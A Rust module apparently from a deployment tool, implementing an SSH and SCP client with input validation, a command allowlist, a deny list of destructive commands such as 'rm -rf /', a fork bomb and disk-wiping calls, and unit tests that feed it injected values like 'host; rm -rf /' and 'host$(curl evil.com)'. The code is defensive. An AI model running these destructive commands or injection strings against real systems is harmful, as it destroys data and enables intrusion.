use crate::core::error::{Error, Result};
use blueprint_core::{debug, info, warn};
use blueprint_std::path::{Path, PathBuf};
use shell_escape::escape;
use tokio::process::Command;
#[derive(Debug, Clone)]
pub struct SecureSshConnection {
pub host: String,
pub port: u16,
pub user: String,
pub key_path: Option<PathBuf>,
pub jump_host: Option<String>,
pub known_hosts_file: Option<PathBuf>,
pub strict_host_checking: bool,
}
impl SecureSshConnection {
pub fn new(host: String, user: String) -> Result<Self> {
Self::validate_hostname(&host)?;
Self::validate_username(&user)?;
Ok(Self {
host,
port: 22,
user,
key_path: None,
jump_host: None,
known_hosts_file: None,
strict_host_checking: true, })
}
pub fn with_port(mut self, port: u16) -> Result<Self> {
if port == 0 {
return Err(Error::ConfigurationError(format!(
"Invalid SSH port: {port}"
)));
}
self.port = port;
Ok(self)
}
pub fn with_key_path<P: AsRef<Path>>(mut self, key_path: P) -> Result<Self> {
let path = key_path.as_ref();
Self::validate_key_path(path)?;
self.key_path = Some(path.to_path_buf());
Ok(self)
}
pub fn with_jump_host(mut self, jump_host: String) -> Result<Self> {
Self::validate_hostname(&jump_host)?;
self.jump_host = Some(jump_host);
Ok(self)
}
pub fn with_known_hosts<P: AsRef<Path>>(mut self, known_hosts: P) -> Result<Self> {
let path = known_hosts.as_ref();
if !path.exists() {
warn!("Known hosts file does not exist: {}", path.display());
}
self.known_hosts_file = Some(path.to_path_buf());
Ok(self)
}
pub fn with_strict_host_checking(mut self, strict: bool) -> Self {
if !strict {
warn!("SECURITY WARNING: Disabling strict host key checking - MITM attacks possible!");
}
self.strict_host_checking = strict;
self
}
fn validate_hostname(host: &str) -> Result<()> {
if host.is_empty() || host.len() > 253 {
return Err(Error::ConfigurationError("Invalid hostname length".into()));
}
let dangerous_chars = [
';', '&', '|', '`', '$', '(', ')', '{', '}', '<', '>', '"', '\'', '\\',
];
if host.chars().any(|c| dangerous_chars.contains(&c)) {
return Err(Error::ConfigurationError(format!(
"Hostname contains dangerous characters: {host}"
)));
}
if !host
.chars()
.all(|c| c.is_ascii_alphanumeric() || "-._".contains(c))
{
return Err(Error::ConfigurationError(format!(
"Invalid hostname format: {host}"
)));
}
Ok(())
}
fn validate_username(user: &str) -> Result<()> {
if user.is_empty() || user.len() > 32 {
return Err(Error::ConfigurationError("Invalid username length".into()));
}
let dangerous_chars = [
';', '&', '|', '`', '$', '(', ')', '{', '}', '<', '>', '"', '\'', '\\',
];
if user.chars().any(|c| dangerous_chars.contains(&c)) {
return Err(Error::ConfigurationError(format!(
"Username contains dangerous characters: {user}"
)));
}
if !user
.chars()
.all(|c| c.is_ascii_alphanumeric() || "-_".contains(c))
{
return Err(Error::ConfigurationError(format!(
"Invalid username format: {user}"
)));
}
Ok(())
}
fn validate_key_path(path: &Path) -> Result<()> {
let path_str = path
.to_str()
.ok_or_else(|| Error::ConfigurationError("Invalid UTF-8 in key path".into()))?;
if path_str.contains("../") || path_str.contains("..\\") {
return Err(Error::ConfigurationError(
"Path traversal detected in key path".into(),
));
}
if !path.exists() {
return Err(Error::ConfigurationError(format!(
"SSH key file does not exist: {}",
path.display()
)));
}
#[cfg(unix)]
{
use std::os::unix::fs::PermissionsExt;
let metadata = path.metadata().map_err(|e| {
Error::ConfigurationError(format!("Cannot read key file metadata: {e}"))
})?;
let perms = metadata.permissions().mode();
if perms & 0o077 != 0 {
warn!(
"SSH key file has overly permissive permissions: {:o}",
perms
);
}
}
Ok(())
}
}
#[derive(Clone)]
pub struct SecureSshClient {
connection: SecureSshConnection,
}
impl SecureSshClient {
pub fn new(connection: SecureSshConnection) -> Self {
Self { connection }
}
pub async fn run_remote_command(&self, command: &str) -> Result<String> {
self.validate_command(command)?;
let ssh_cmd = self.build_secure_ssh_command(command)?;
debug!("Executing SSH command: {}", ssh_cmd);
let output = Command::new("sh")
.arg("-c")
.arg(&ssh_cmd)
.output()
.await
.map_err(|e| Error::ConfigurationError(format!("SSH command failed: {e}")))?;
if !output.status.success() {
let stderr = String::from_utf8_lossy(&output.stderr);
return Err(Error::ConfigurationError(format!(
"Remote command failed: {stderr}"
)));
}
Ok(String::from_utf8_lossy(&output.stdout).to_string())
}
fn build_secure_ssh_command(&self, command: &str) -> Result<String> {
let mut ssh_cmd = String::from("ssh");
if self.connection.strict_host_checking {
ssh_cmd.push_str(" -o StrictHostKeyChecking=yes");
if let Some(ref known_hosts) = self.connection.known_hosts_file {
let known_hosts_str = known_hosts.to_str().ok_or_else(|| {
Error::ConfigurationError("Known hosts path contains invalid UTF-8".to_string())
})?;
ssh_cmd.push_str(&format!(
" -o UserKnownHostsFile={}",
escape(known_hosts_str.into())
));
}
} else {
warn!("Using insecure SSH configuration - MITM attacks possible!");
ssh_cmd.push_str(" -o StrictHostKeyChecking=no");
ssh_cmd.push_str(" -o UserKnownHostsFile=/dev/null");
}
ssh_cmd.push_str(" -o ConnectTimeout=30");
ssh_cmd.push_str(" -o ServerAliveInterval=60");
ssh_cmd.push_str(" -o ServerAliveCountMax=3");
ssh_cmd.push_str(" -o BatchMode=yes");
if self.connection.port != 22 {
ssh_cmd.push_str(&format!(" -p {}", self.connection.port));
}
if let Some(ref key_path) = self.connection.key_path {
let key_path_str = key_path.to_str().ok_or_else(|| {
Error::ConfigurationError("SSH key path contains invalid UTF-8".to_string())
})?;
let escaped_path = escape(key_path_str.into());
ssh_cmd.push_str(&format!(" -i {escaped_path}"));
}
if let Some(ref jump_host) = self.connection.jump_host {
let escaped_jump = escape(jump_host.into());
ssh_cmd.push_str(&format!(" -J {escaped_jump}"));
}
let escaped_user = escape(self.connection.user.as_str().into());
let escaped_host = escape(self.connection.host.as_str().into());
ssh_cmd.push_str(&format!(" {escaped_user}@{escaped_host}"));
let escaped_command = escape(command.into());
ssh_cmd.push_str(&format!(" {escaped_command}"));
Ok(ssh_cmd)
}
const ALLOWED_CMD_PREFIXES: &'static [&'static str] = &[
"echo ",
"docker ",
"podman ",
"ctr ",
"sudo ",
"mkdir ",
"chmod ",
"systemctl ",
"apt-get ",
"curl ",
"nginx ",
"cat ",
"tee ",
"install ",
"test ",
"ls ",
"cp ",
"mv ",
"rm ",
"tar ",
"sysctl ",
"journalctl ",
"grep ",
"head ",
"tail ",
"stat ",
"uname ",
"whoami",
"id ",
"ip ",
"#", "\n", ];
fn validate_command(&self, command: &str) -> Result<()> {
if command.is_empty() {
return Err(Error::ConfigurationError(
"Empty command not allowed".into(),
));
}
if command.len() > 8192 {
return Err(Error::ConfigurationError("Command too long".into()));
}
if command.contains('\0') {
return Err(Error::ConfigurationError(
"Command contains null bytes".into(),
));
}
let trimmed = command.trim();
for line in trimmed.lines() {
let line = line.trim();
if line.is_empty() || line.starts_with('#') {
continue;
}
if !Self::ALLOWED_CMD_PREFIXES
.iter()
.any(|prefix| line.starts_with(prefix))
{
return Err(Error::ConfigurationError(format!(
"Command not in allowlist: {}",
line.chars().take(80).collect::<String>()
)));
}
}
let dangerous_patterns = [
"rm -rf /",
":(){ :|:& };:",
"dd if=/dev/zero",
"mkfs.",
"fdisk",
"parted",
];
for pattern in &dangerous_patterns {
if command.contains(pattern) {
return Err(Error::ConfigurationError(format!(
"Dangerous command pattern detected: {pattern}"
)));
}
}
Ok(())
}
pub async fn copy_files(&self, local_path: &Path, remote_path: &str) -> Result<()> {
self.validate_local_path(local_path)?;
self.validate_remote_path(remote_path)?;
let scp_cmd = self.build_secure_scp_command(local_path, remote_path)?;
info!(
"Copying files via SCP: {} -> {}",
local_path.display(),
remote_path
);
let output = Command::new("sh")
.arg("-c")
.arg(&scp_cmd)
.output()
.await
.map_err(|e| Error::ConfigurationError(format!("SCP failed: {e}")))?;
if !output.status.success() {
let stderr = String::from_utf8_lossy(&output.stderr);
return Err(Error::ConfigurationError(format!(
"File copy failed: {stderr}"
)));
}
info!("Files copied successfully");
Ok(())
}
fn build_secure_scp_command(&self, local_path: &Path, remote_path: &str) -> Result<String> {
let mut scp_cmd = String::from("scp");
if self.connection.strict_host_checking {
scp_cmd.push_str(" -o StrictHostKeyChecking=yes");
if let Some(ref known_hosts) = self.connection.known_hosts_file {
let known_hosts_str = known_hosts.to_str().ok_or_else(|| {
Error::ConfigurationError("Known hosts path contains invalid UTF-8".to_string())
})?;
scp_cmd.push_str(&format!(
" -o UserKnownHostsFile={}",
escape(known_hosts_str.into())
));
}
} else {
warn!("Using insecure SCP configuration");
scp_cmd.push_str(" -o StrictHostKeyChecking=no");
scp_cmd.push_str(" -o UserKnownHostsFile=/dev/null");
}
if self.connection.port != 22 {
scp_cmd.push_str(&format!(" -P {}", self.connection.port));
}
if let Some(ref key_path) = self.connection.key_path {
let key_path_str = key_path.to_str().ok_or_else(|| {
Error::ConfigurationError("SSH key path contains invalid UTF-8".to_string())
})?;
let escaped_path = escape(key_path_str.into());
scp_cmd.push_str(&format!(" -i {escaped_path}"));
}
let local_path_str = local_path.to_str().ok_or_else(|| {
Error::ConfigurationError("Local path contains invalid UTF-8".to_string())
})?;
let escaped_local = escape(local_path_str.into());
let escaped_user = escape(self.connection.user.as_str().into());
let escaped_host = escape(self.connection.host.as_str().into());
let escaped_remote = escape(remote_path.into());
scp_cmd.push_str(&format!(
" {escaped_local} {escaped_user}@{escaped_host}:{escaped_remote}"
));
Ok(scp_cmd)
}
fn validate_local_path(&self, path: &Path) -> Result<()> {
if !path.exists() {
return Err(Error::ConfigurationError(format!(
"Local file does not exist: {}",
path.display()
)));
}
let path_str = path
.to_str()
.ok_or_else(|| Error::ConfigurationError("Invalid UTF-8 in local path".into()))?;
if path_str.contains("../") || path_str.contains("..\\") {
return Err(Error::ConfigurationError(
"Path traversal detected in local path".into(),
));
}
Ok(())
}
fn validate_remote_path(&self, path: &str) -> Result<()> {
if path.is_empty() {
return Err(Error::ConfigurationError("Empty remote path".into()));
}
if path.len() > 4096 {
return Err(Error::ConfigurationError("Remote path too long".into()));
}
let dangerous_chars = [
';', '&', '|', '`', '$', '(', ')', '{', '}', '<', '>', '"', '\\',
];
if path.chars().any(|c| dangerous_chars.contains(&c)) {
return Err(Error::ConfigurationError(format!(
"Remote path contains dangerous characters: {path}"
)));
}
Ok(())
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_secure_ssh_connection_validation() {
let conn = SecureSshConnection::new("example.com".to_string(), "user".to_string()).unwrap();
assert_eq!(conn.host, "example.com");
assert_eq!(conn.user, "user");
assert!(conn.strict_host_checking);
assert!(
SecureSshConnection::new("host; rm -rf /".to_string(), "user".to_string()).is_err()
);
assert!(
SecureSshConnection::new("example.com".to_string(), "user; id".to_string()).is_err()
);
}
#[test]
fn test_command_validation() {
let conn = SecureSshConnection::new("example.com".to_string(), "user".to_string()).unwrap();
let client = SecureSshClient::new(conn);
assert!(client.validate_command("ls -la").is_ok());
assert!(client.validate_command("rm -rf /").is_err());
assert!(client.validate_command(":(){ :|:& };:").is_err());
assert!(client.validate_command("").is_err());
}
#[test]
fn test_hostname_validation() {
assert!(SecureSshConnection::validate_hostname("example.com").is_ok());
assert!(SecureSshConnection::validate_hostname("192.168.1.1").is_ok());
assert!(SecureSshConnection::validate_hostname("host; rm -rf /").is_err());
assert!(SecureSshConnection::validate_hostname("host$(curl evil.com)").is_err());
assert!(SecureSshConnection::validate_hostname("").is_err());
}
}